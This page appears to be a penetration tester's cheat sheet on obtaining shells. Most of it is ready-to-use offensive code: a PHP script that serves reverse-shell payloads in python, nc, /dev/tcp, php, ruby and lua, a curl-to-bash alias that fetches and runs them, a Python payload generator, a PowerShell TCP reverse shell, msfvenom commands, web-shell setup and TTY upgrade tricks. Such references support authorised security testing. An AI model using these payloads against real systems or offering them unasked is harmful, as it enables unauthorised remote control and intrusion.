Shells

Reverse Shells

Dynamic revshell

<?php

$ip = isset($_GET['ip']) ? $_GET['ip'] : 'localhost';
$port = isset($_GET['port']) ? $_GET['port'] : '9001';

$xct = <<<EOT
if command -v python > /dev/null 2>&1; then
    python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{$ip}",{$port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v python3 > /dev/null 2>&1; then
    python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{$ip}",{$port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v nc > /dev/null 2>&1; then
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f
    exit;
fi

if command -v sh > /dev/null 2>&1; then
    /bin/sh -i >& /dev/tcp/{$ip}/{$port} 0>&1
    exit;
fi

if command -v php > /dev/null 2>&1; then
    php -r '$sock=fsockopen("{$ip}",{$port});exec("/bin/sh -i <&3 >&3 2>&3");'
    exit;
fi

if command -v ruby > /dev/null 2>&1; then
    ruby -rsocket -e'f=TCPSocket.open("{$ip}",{$port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    exit;
fi

if command -v lua > /dev/null 2>&1; then
    lua -e "require('socket');require('os');t=socket.tcp();t:connect('{$ip}','{$port}');os.execute('/bin/sh -i <&3 >&3 2>&3');"
    exit;
EOT;

echo $xct;
?>

alias shell='f(){ curl "http://10.10.10.10/shell.php?ip=$1&port=$2"; }; f'

shell 192.168.10.10 9001|bash

Python generator

#!/usr/bin/env python3

import sys

if len(sys.argv) < 4:
    print("Usage: python3 xct.py <lhost> <lport> <filename>")
    sys.exit(0)

lhost = sys.argv[1]
lport = sys.argv[2]
fname = sys.argv[3]

xct = f'''
if command -v python > /dev/null 2>&1; then
     python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{lhost}",{lport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v python3 > /dev/null 2>&1; then
    python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{lhost}",{lport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v nc > /dev/null 2>&1; then
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f
    exit;
fi

if command -v sh > /dev/null 2>&1; then
    /bin/sh -i >& /dev/tcp/{lhost}/{lport} 0>&1
    exit;
fi

if command -v php > /dev/null 2>&1; then
    php -r '$sock=fsockopen("{lhost}",{lport});exec("/bin/sh -i <&3 >&3 2>&3");'
    exit;
fi

if command -v ruby > /dev/null 2>&1; then
    ruby -rsocket -e'f=TCPSocket.open("$IP",$PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    exit;
fi

if command -v lua > /dev/null 2>&1; then
    lua -e "require('socket');require('os');t=socket.tcp();t:connect('{lhost}','{lport}');os.execute('/bin/sh -i <&3 >&3 2>&3');"
    exit;
'''

with open(fname, "w") as f:
    f.write(xct)
    f.close()

Windows

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

MSFvenom

msfvenom -l payloads

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f elf > exploit.elf

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe > exploit.exe

Web Shells

Edit the following script to add our authorized IP address (line 59).

cp /usr/share/seclists/Web-Shells/laudanum-0.8/aspx/shell.aspx /home/qu35t/shell.aspx

cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/qu35t/shell.aspx

Shell Upgrade

python -c 'import pty;pty.spawn("/bin/bash")'
[CTRL + Z]
stty raw -echo;fg
[ENTER (x2)]
export TERM=xterm
stty rows 33 cols 119

python3 -c 'import pty;pty.spawn("/bin/bash")'
[CTRL + Z]
stty raw -echo;fg
[ENTER (x2)]
export TERM=xterm
stty rows 33 cols 119

script /dev/null -c bash
[CTRL + Z]
stty raw -echo;fg
[ENTER (x2)]
export TERM=xterm
stty rows 33 cols 119

Spawning Interactive Shells

/bin/bash -i

perl —e 'exec "/bin/bash";'

ruby -e 'exec "/bin/bash"'

awk 'BEGIN {system("/bin/bash")}'

find . -exec /bin/bash \; -quit

vim -c ':!/bin/bash'

vim
:set shell=/bin/bash
:shell

References

Nishang

PreviousDocker Breakout NextSSTI

Last updated 11 months ago